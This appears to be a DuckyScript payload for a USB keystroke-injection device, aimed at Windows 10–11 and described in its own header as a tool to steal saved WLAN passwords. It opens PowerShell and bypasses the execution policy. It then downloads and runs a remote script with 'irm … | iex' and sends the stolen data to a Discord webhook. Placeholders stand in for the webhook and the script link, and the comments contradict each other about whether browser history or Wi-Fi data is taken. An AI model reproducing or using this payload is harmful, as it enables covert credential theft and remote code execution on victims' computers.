REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : true_lock                                        |
REM # Description: A script used to steal target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 2.0                                              |
REM #                                                                 |
REM ###################################################################

REM Browser History to Discord Webhook
GUI r
STRINGLN powershell
STRINGLN Set-ExecutionPolicy Bypass -Scope Process -Force

REM Saved WiFi Info to Discord Webhook
STRING $whuri='YOUR_WEBHOOK_URL'; irm LINK_TO_THE_SCRIPT_HERE | iex
ENTER

STRING exit
ENTER
